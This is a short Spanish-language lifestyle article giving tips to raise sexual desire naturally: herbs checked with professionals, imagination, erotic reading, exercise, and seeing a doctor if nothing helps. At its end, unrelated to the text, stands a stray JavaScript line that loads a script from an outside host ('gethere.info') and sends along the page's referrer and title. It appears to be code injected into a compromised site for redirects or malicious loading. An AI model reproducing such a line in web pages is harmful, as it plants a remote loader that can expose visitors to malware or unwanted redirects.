Tips para aumentar el deseo sexual de forma natural

Por Elizabeth Palacios      @ely__palacios

Existen varios factores que pueden alterar nuestro deseo sexual, tales como las hormonas, el estrés, la presión o conflictos personales o de pareja.

No te asustes si estás teniendo problemas con la disminución de tu libido, pues no necesariamente tienes que recurrir a tratamientos médicos para solucionarlo.

Existen formas naturales para aumentar el deseo sexual y evitar que tu relación de pareja se fracture.

En WTF Online te decimos algunos tips para aumentar el deseo de forma natural:

Plantas medicinales

Existen algunos tipos de plantas medicinales que tienen efectos positivos para aumentar tu actividad sexual, te recomendamos que investigues con profesionales cuáles son éstas para que no te engañen algunos charlatanes.

Imaginación

El poder de tu mente es enorme, utiliza tu cerebro y tu imaginación para pensar en sexo, visualiza a tu pareja en todas las situaciones que te provoquen sexualmente, eso ayudará que el deseo sexual no disminuya.

Literatura erótica

Si te gusta la lectura, recurre a literatura erótica, existen autores que son tan descriptivos que harán que tu imaginación vuele, además de que muy probablemente te excitarás con tan solo leerlos.

Practica algún deporte

La actividad física es básica para mejorar tu vida sexual, el ejercicio estimula la circulación, por lo que tus erecciones serán más potentes, además de que tu cuerpo produce endorfinas que harán que te sientas mucho más feliz.

Es importante que si ninguna de estas opciones te ayuda a mejorar tu deseo sexual, debes acudir a un médico que te diagnostique y te ayude a superar este problema.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)